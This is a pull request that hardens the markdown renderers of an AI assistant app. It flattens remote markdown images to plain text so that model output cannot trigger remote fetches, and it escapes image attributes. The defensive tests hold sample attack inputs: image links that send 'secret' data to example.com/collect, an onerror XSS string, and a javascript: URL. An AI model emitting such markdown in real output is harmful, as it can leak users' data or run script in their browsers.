### PR TITLE
fix: flatten remote markdown images

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -231,6 +231,7 @@ Docs: https://docs.openclaw.ai
 - Daemon/systemd fresh-install probe: check for OpenClaw's managed user unit before running `systemctl --user is-enabled`, so first-time Linux installs no longer fail on generic missing-unit probe errors. (#38819) Thanks @adaHubble.
 - Gateway/Windows restart supervision: relaunch task-managed gateways through Scheduled Task with quoted helper-script command paths, distinguish restart-capable supervisors per platform, and stop orphaned Windows gateway children during self-restart. (#38825) Thanks @obviyus.
 - Telegram/native topic command routing: resolve forum-topic native commands through the same conversation route as inbound messages so topic `agentId` overrides and bound topic sessions target the active session instead of the default topic-parent session. (#38871) Thanks @obviyus.
+- Markdown/assistant image hardening: flatten remote markdown images to plain text across the Control UI, exported HTML, and shared Swift chat while keeping inline `data:image/...` markdown renderable, so model output no longer triggers automatic remote image fetches. (#38895) Thanks @obviyus.
 
 ## 2026.3.2
 

--- a/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift
+++ b/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift
@@ -40,24 +40,22 @@ enum ChatMarkdownPreprocessor {
         if matches.isEmpty { return Result(cleaned: self.normalize(withoutTimestamps), images: []) }
 
         var images: [InlineImage] = []
-        var cleaned = withoutTimestamps
+        let cleaned = NSMutableString(string: withoutTimestamps)
 
         for match in matches.reversed() {
             guard match.numberOfRanges >= 3 else { continue }
             let label = ns.substring(with: match.range(at: 1))
             let source = ns.substring(with: match.range(at: 2))
 
-            let start = cleaned.index(cleaned.startIndex, offsetBy: match.range.location)
-            let end = cleaned.index(start, offsetBy: match.range.length)
             if let inlineImage = self.inlineImage(label: label, source: source) {
                 images.append(inlineImage)
-                cleaned.replaceSubrange(start..<end, with: "")
+                cleaned.replaceCharacters(in: match.range, with: "")
             } else {
-                cleaned.replaceSubrange(start..<end, with: self.fallbackImageLabel(label))
+                cleaned.replaceCharacters(in: match.range, with: self.fallbackImageLabel(label))
             }
         }
 
-        return Result(cleaned: self.normalize(cleaned), images: images.reversed())
+        return Result(cleaned: self.normalize(cleaned as String), images: images.reversed())
     }
 
     private static func inlineImage(label: String, source: String) -> InlineImage? {

--- a/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift
+++ b/apps/shared/OpenClawKit/Sources/OpenClawChatUI/ChatMarkdownPreprocessor.swift
@@ -13,6 +13,8 @@ enum ChatMarkdownPreprocessor {
         "Chat history since last reply (untrusted, for context):",
     ]
 
+    private static let markdownImagePattern = #"!\[([^\]]*)\]\(([^)]+)\)"#
+
     struct InlineImage: Identifiable {
         let id = UUID()
         let label: String
@@ -27,8 +29,7 @@ enum ChatMarkdownPreprocessor {
     static func preprocess(markdown raw: String) -> Result {
         let withoutContextBlocks = self.stripInboundContextBlocks(raw)
         let withoutTimestamps = self.stripPrefixedTimestamps(withoutContextBlocks)
-        let pattern = #"!\[([^\]]*)\]\((data:image\/[^;]+;base64,[^)]+)\)"#
-        guard let re = try? NSRegularExpression(pattern: pattern) else {
+        guard let re = try? NSRegularExpression(pattern: self.markdownImagePattern) else {
             return Result(cleaned: self.normalize(withoutTimestamps), images: [])
         }
 
@@ -44,22 +45,39 @@ enum ChatMarkdownPreprocessor {
         for match in matches.reversed() {
             guard match.numberOfRanges >= 3 else { continue }
             let label = ns.substring(with: match.range(at: 1))
-            let dataURL = ns.substring(with: match.range(at: 2))
-
-            let image: OpenClawPlatformImage? = {
-                guard let comma = dataURL.firstIndex(of: ",") else { return nil }
-                let b64 = String(dataURL[dataURL.index(after: comma)...])
-                guard let data = Data(base64Encoded: b64) else { return nil }
-                return OpenClawPlatformImage(data: data)
-            }()
-            images.append(InlineImage(label: label, image: image))
+            let source = ns.substring(with: match.range(at: 2))
 
             let start = cleaned.index(cleaned.startIndex, offsetBy: match.range.location)
             let end = cleaned.index(start, offsetBy: match.range.length)
-            cleaned.replaceSubrange(start..<end, with: "")
+            if let inlineImage = self.inlineImage(label: label, source: source) {
+                images.append(inlineImage)
+                cleaned.replaceSubrange(start..<end, with: "")
+            } else {
+                cleaned.replaceSubrange(start..<end, with: self.fallbackImageLabel(label))
+            }
         }
 
         return Result(cleaned: self.normalize(cleaned), images: images.reversed())
+    }
+
+    private static func inlineImage(label: String, source: String) -> InlineImage? {
+        let trimmed = source.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard let comma = trimmed.firstIndex(of: ","),
+              trimmed[..<comma].range(
+                  of: #"^data:image\/[^;]+;base64$"#,
+                  options: [.regularExpression, .caseInsensitive]) != nil
+        else {
+            return nil
+        }
+
+        let b64 = String(trimmed[trimmed.index(after: comma)...])
+        let image = Data(base64Encoded: b64).flatMap(OpenClawPlatformImage.init(data:))
+        return InlineImage(label: label, image: image)
+    }
+
+    private static func fallbackImageLabel(_ label: String) -> String {
+        let trimmed = label.trimmingCharacters(in: .whitespacesAndNewlines)
+        return trimmed.isEmpty ? "image" : trimmed
     }
 
     private static func stripInboundContextBlocks(_ raw: String) -> String {

--- a/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift
+++ b/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift
@@ -42,6 +42,15 @@ struct ChatMarkdownPreprocessorTests {
         #expect(result.images.isEmpty)
     }
 
+    @Test func handlesUnicodeBeforeRemoteMarkdownImages() {
+        let markdown = "🙂![Leak](https://example.com/image.png)"
+
+        let result = ChatMarkdownPreprocessor.preprocess(markdown: markdown)
+
+        #expect(result.cleaned == "🙂Leak")
+        #expect(result.images.isEmpty)
+    }
+
     @Test func stripsInboundUntrustedContextBlocks() {
         let markdown = """
         Conversation info (untrusted metadata):

--- a/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift
+++ b/apps/shared/OpenClawKit/Tests/OpenClawKitTests/ChatMarkdownPreprocessorTests.swift
@@ -18,6 +18,30 @@ struct ChatMarkdownPreprocessorTests {
         #expect(result.images.first?.image != nil)
     }
 
+    @Test func flattensRemoteMarkdownImagesIntoText() {
+        let base64 = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQIHWP4////GQAJ+wP/2hN8NwAAAABJRU5ErkJggg=="
+        let markdown = """
+        ![Leak](https://example.com/collect?x=1)
+
+        ![Pixel](data:image/png;base64,\(base64))
+        """
+
+        let result = ChatMarkdownPreprocessor.preprocess(markdown: markdown)
+
+        #expect(result.cleaned == "Leak")
+        #expect(result.images.count == 1)
+        #expect(result.images.first?.image != nil)
+    }
+
+    @Test func usesFallbackTextForUnlabeledRemoteMarkdownImages() {
+        let markdown = "![](https://example.com/image.png)"
+
+        let result = ChatMarkdownPreprocessor.preprocess(markdown: markdown)
+
+        #expect(result.cleaned == "image")
+        #expect(result.images.isEmpty)
+    }
+
     @Test func stripsInboundUntrustedContextBlocks() {
         let markdown = """
         Conversation info (untrusted metadata):

--- a/src/auto-reply/reply/export-html/template.js
+++ b/src/auto-reply/reply/export-html/template.js
@@ -665,6 +665,10 @@
     return div.innerHTML;
   }
 
+  function escapeHtmlAttr(text) {
+    return escapeHtml(text).replaceAll('"', "&quot;").replaceAll("'", "&#39;");
+  }
+
   // Validate image fields before interpolating data URLs.
   const SAFE_IMAGE_MIME_RE = /^image\/(png|jpeg|gif|webp|svg\+xml|bmp|tiff|avif)$/i;
   const SAFE_BASE64_RE = /^[A-Za-z0-9+/]+={0,2}$/;
@@ -1725,7 +1729,7 @@
     if (!INLINE_DATA_IMAGE_RE.test(href)) {
       return escapeHtml(label);
     }
-    return `<img src="${escapeHtml(href)}" alt="${escapeHtml(label)}">`;
+    return `<img src="${escapeHtmlAttr(href)}" alt="${escapeHtmlAttr(label)}">`;
   }
 
   // Configure marked with syntax highlighting and HTML escaping for text

--- a/src/auto-reply/reply/export-html/template.js
+++ b/src/auto-reply/reply/export-html/template.js
@@ -1712,6 +1712,22 @@
     return text.replace(/<(?=[a-zA-Z/])/g, "&lt;");
   }
 
+  const INLINE_DATA_IMAGE_RE = /^data:image\/[a-z0-9.+-]+;base64,/i;
+
+  function normalizeMarkdownImageLabel(text) {
+    const trimmed = typeof text === "string" ? text.trim() : "";
+    return trimmed || "image";
+  }
+
+  function renderMarkdownImage(token) {
+    const label = normalizeMarkdownImageLabel(token?.text);
+    const href = typeof token?.href === "string" ? token.href.trim() : "";
+    if (!INLINE_DATA_IMAGE_RE.test(href)) {
+      return escapeHtml(label);
+    }
+    return `<img src="${escapeHtml(href)}" alt="${escapeHtml(label)}">`;
+  }
+
   // Configure marked with syntax highlighting and HTML escaping for text
   marked.use({
     breaks: true,
@@ -1749,6 +1765,9 @@
       // Raw HTML blocks/inline HTML: escape to prevent script execution.
       html(token) {
         return escapeHtml(token.text);
+      },
+      image(token) {
+        return renderMarkdownImage(token);
       },
     },
   });

--- a/src/auto-reply/reply/export-html/template.security.test.ts
+++ b/src/auto-reply/reply/export-html/template.security.test.ts
@@ -250,4 +250,38 @@ describe("export html security hardening", () => {
     expect(img?.getAttribute("onerror")).toBeNull();
     expect(img?.getAttribute("src")).toBe("data:application/octet-stream;base64,AAAA");
   });
+
+  it("flattens remote markdown images but keeps data-image markdown", () => {
+    const dataImage = "data:image/png;base64,AAAA";
+    const session: SessionData = {
+      header: { id: "session-4", timestamp: now() },
+      entries: [
+        {
+          id: "1",
+          parentId: null,
+          timestamp: now(),
+          type: "message",
+          message: {
+            role: "assistant",
+            content: [
+              {
+                type: "text",
+                text: `Leak:\n\n![exfil](https://example.com/collect?data=secret)\n\n![pixel](${dataImage})`,
+              },
+            ],
+          },
+        },
+      ],
+      leafId: "1",
+      systemPrompt: "",
+      tools: [],
+    };
+
+    const { document } = renderTemplate(session);
+    const messages = document.getElementById("messages");
+    expect(messages).toBeTruthy();
+    expect(messages?.querySelector('img[src^="https://"]')).toBeNull();
+    expect(messages?.textContent).toContain("exfil");
+    expect(messages?.querySelector(`img[src="${dataImage}"]`)).toBeTruthy();
+  });
 });

--- a/src/auto-reply/reply/export-html/template.security.test.ts
+++ b/src/auto-reply/reply/export-html/template.security.test.ts
@@ -284,4 +284,38 @@ describe("export html security hardening", () => {
     expect(messages?.textContent).toContain("exfil");
     expect(messages?.querySelector(`img[src="${dataImage}"]`)).toBeTruthy();
   });
+
+  it("escapes markdown data-image attributes", () => {
+    const dataImage = "data:image/png;base64,AAAA";
+    const session: SessionData = {
+      header: { id: "session-5", timestamp: now() },
+      entries: [
+        {
+          id: "1",
+          parentId: null,
+          timestamp: now(),
+          type: "message",
+          message: {
+            role: "assistant",
+            content: [
+              {
+                type: "text",
+                text: `![x" onerror="alert(1)](${dataImage})`,
+              },
+            ],
+          },
+        },
+      ],
+      leafId: "1",
+      systemPrompt: "",
+      tools: [],
+    };
+
+    const { document } = renderTemplate(session);
+    const img = document.querySelector("#messages img");
+    expect(img).toBeTruthy();
+    expect(img?.getAttribute("onerror")).toBeNull();
+    expect(img?.getAttribute("alt")).toBe('x" onerror="alert(1)');
+    expect(img?.getAttribute("src")).toBe(dataImage);
+  });
 });

--- a/ui/src/ui/markdown.test.ts
+++ b/ui/src/ui/markdown.test.ts
@@ -30,11 +30,10 @@ describe("toSanitizedMarkdownHtml", () => {
     expect(html).toContain("console.log(1)");
   });
 
-  it("preserves img tags with src and alt from markdown images (#15437)", () => {
+  it("flattens remote markdown images into alt text", () => {
     const html = toSanitizedMarkdownHtml("![Alt text](https://example.com/image.png)");
-    expect(html).toContain("<img");
-    expect(html).toContain('src="https://example.com/image.png"');
-    expect(html).toContain('alt="Alt text"');
+    expect(html).not.toContain("<img");
+    expect(html).toContain("Alt text");
   });
 
   it("preserves base64 data URI images (#15437)", () => {
@@ -43,11 +42,17 @@ describe("toSanitizedMarkdownHtml", () => {
     expect(html).toContain("data:image/png;base64,");
   });
 
-  it("strips javascript image urls", () => {
+  it("flattens non-data markdown image urls", () => {
     const html = toSanitizedMarkdownHtml("![X](javascript:alert(1))");
-    expect(html).toContain("<img");
+    expect(html).not.toContain("<img");
     expect(html).not.toContain("javascript:");
-    expect(html).not.toContain("src=");
+    expect(html).toContain("X");
+  });
+
+  it("uses a plain fallback label for unlabeled markdown images", () => {
+    const html = toSanitizedMarkdownHtml("![](https://example.com/image.png)");
+    expect(html).not.toContain("<img");
+    expect(html).toContain("image");
   });
 
   it("renders GFM markdown tables (#20410)", () => {

--- a/ui/src/ui/markdown.ts
+++ b/ui/src/ui/markdown.ts
@@ -43,6 +43,7 @@ const MARKDOWN_CHAR_LIMIT = 140_000;
 const MARKDOWN_PARSE_LIMIT = 40_000;
 const MARKDOWN_CACHE_LIMIT = 200;
 const MARKDOWN_CACHE_MAX_CHARS = 50_000;
+const INLINE_DATA_IMAGE_RE = /^data:image\/[a-z0-9.+-]+;base64,/i;
 const markdownCache = new Map<string, string>();
 
 function getCachedMarkdown(key: string): string | null {
@@ -137,6 +138,19 @@ export function toSanitizedMarkdownHtml(markdown: string): string {
 // pages) as formatted output is confusing UX (#13937).
 const htmlEscapeRenderer = new marked.Renderer();
 htmlEscapeRenderer.html = ({ text }: { text: string }) => escapeHtml(text);
+htmlEscapeRenderer.image = (token: { href?: string | null; text?: string | null }) => {
+  const label = normalizeMarkdownImageLabel(token.text);
+  const href = token.href?.trim() ?? "";
+  if (!INLINE_DATA_IMAGE_RE.test(href)) {
+    return escapeHtml(label);
+  }
+  return `<img src="${escapeHtml(href)}" alt="${escapeHtml(label)}">`;
+};
+
+function normalizeMarkdownImageLabel(text?: string | null): string {
+  const trimmed = text?.trim();
+  return trimmed ? trimmed : "image";
+}
 
 function escapeHtml(value: string): string {
   return value


### PR DESCRIPTION
## Summary

- Problem: remote markdown images in assistant output could auto-load in some renderers.
- Why it matters: model output should not trigger remote fetches just by being rendered.
- What changed: keep `data:image/...` markdown images; flatten all other markdown images to alt text or `image` in Control UI, exported HTML, and shared Swift chat.
- What did NOT change (scope boundary): no provider, transcript, or CSP changes.

## Change Type (select all)

- [x] Bug fix
- [ ] Feature
- [ ] Refactor
- [ ] Docs
- [x] Security hardening
- [ ] Chore/infra

## Scope (select all touched areas)

- [ ] Gateway / orchestration
- [ ] Skills / tool execution
- [ ] Auth / tokens
- [ ] Memory / storage
- [ ] Integrations
- [ ] API / contracts
- [x] UI / DX
- [ ] CI/CD / infra

## Linked Issue/PR

- Closes #
- Related #

## User-visible / Behavior Changes

- Remote markdown images now render as plain text labels instead of loading.
- Inline `data:image/...` markdown still renders as images.

## Security Impact (required)

- New permissions/capabilities? `No`
- Secrets/tokens handling changed? `No`
- New/changed network calls? `No`
- Command/tool execution surface changed? `No`
- Data access scope changed? `No`
- If any `Yes`, explain risk + mitigation:

## Repro + Verification

### Environment

- OS: macOS
- Runtime/container: local dev
- Model/provider: n/a
- Integration/channel (if any): Control UI, export HTML, shared Swift chat renderer
- Relevant config (redacted): default

### Steps

1. Render assistant markdown with `![exfil](https://example.com/collect?x=1)`.
2. Render assistant markdown with `![pixel](data:image/png;base64,...)`.
3. Verify the remote image is flattened and the data image still renders.

### Expected

- Remote markdown images do not auto-load.
- Data images still render inline.

### Actual

- Tests pass for the touched renderer paths.

## Evidence

- [x] Failing test/log before + passing after
- [ ] Trace/log snippets
- [ ] Screenshot/recording
- [ ] Perf numbers (if relevant)

## Human Verification (required)

What you personally verified (not just CI), and how:

- Verified scenarios: `pnpm vitest run src/ui/markdown.test.ts` in `ui/`; `pnpm exec vitest run src/auto-reply/reply/export-html/template.security.test.ts`; `swift test --filter ChatMarkdownPreprocessorTests` in `apps/shared/OpenClawKit`
- Edge cases checked: unlabeled markdown images, `javascript:` image URLs, `data:image/...`
- What you did **not** verify: full iOS/macOS app UI manually

## Compatibility / Migration

- Backward compatible? `Yes`
- Config/env changes? `No`
- Migration needed? `No`
- If yes, exact upgrade steps:

## Failure Recovery (if this breaks)

- How to disable/revert this change quickly: revert commit `de964a8f7e5b1a4ef1162753e12c1acc2c2288b0`
- Files/config to restore: the 6 touched renderer/test files in this PR
- Known bad symptoms reviewers should watch for: alt text shown where remote markdown images previously rendered

## Risks and Mitigations

- Risk: some content may have relied on remote markdown images for display.
- Mitigation: `data:image/...` markdown is still supported, and non-data images degrade to readable text.
